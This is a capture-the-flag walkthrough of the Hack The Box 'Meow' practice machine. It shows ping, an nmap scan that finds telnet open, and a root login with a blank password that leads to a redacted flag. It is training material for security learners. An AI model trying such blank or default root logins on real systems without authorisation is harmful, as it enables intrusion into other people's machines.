nopedawn

HTB | Meow - Starting Point

https://app.hackthebox.com/machines/Meow/



Meow | Walkthrough

Phase
Reconnaissance
Foothold

My first piece of cake HTB Machine, I was given the following ip machine 10.129.57.14, then I checked it using ping

ping
nopedawn@npdn ~/L/H/S/Meow> ping 10.129.57.14
PING 10.129.57.14 (10.129.57.14) 56(84) bytes of data.
64 bytes from 10.129.57.14: icmp_seq=1 ttl=63 time=253 ms
64 bytes from 10.129.57.14: icmp_seq=2 ttl=63 time=254 ms
64 bytes from 10.129.57.14: icmp_seq=3 ttl=63 time=255 ms
64 bytes from 10.129.57.14: icmp_seq=4 ttl=63 time=254 ms
64 bytes from 10.129.57.14: icmp_seq=5 ttl=63 time=256 ms
^C
--- 10.129.57.14 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4006ms
rtt min/avg/max/mdev = 252.961/254.165/255.609/0.900 ms

Reconnaissance

I use nmap to enumerate all open ports in the target

nmap -sV 10.129.57.14
nmap
nopedawn@npdn ~/L/H/S/Meow> nmap -sV 10.129.57.14
Starting Nmap 7.80 ( https://nmap.org ) at 2026-02-04 16:32 WIB
Nmap scan report for 10.129.57.14
Host is up (0.61s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.56 seconds

Port 23/tcp is open for the telnet. So I tried to connecting into it using this following command

telnet 10.129.57.14

Foothold

telnet
nopedawn@npdn ~/L/H/S/Meow> telnet 10.129.57.14
Trying 10.129.57.14...
Connected to 10.129.57.14.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█


Meow login: admin
Password:

Login incorrect
Meow login: user
Password:

Login incorrect
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 04 Feb 2026 09:36:55 AM UTC

  System load:           0.0
  Usage of /:            41.7% of 7.75GB
  Memory usage:          4%
  Swap usage:            0%
  Processes:             135
  Users logged in:       0
  IPv4 address for eth0: 10.129.57.14
  IPv6 address for eth0: dead:beef::250:56ff:feb0:c374

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
root@Meow:~#

I succeed to login using weak credential root and leave it blank for the password, and the flag is stored in root home directory

root@Meow:~# ls
flag.txt  snap
root@Meow:~# cat flag.txt
REDACTED

You can see the flag if you finish it by yourself, for now I redacted

Prev
HTB | Fawn - Starting Point
Next
ITSEC CTF 2025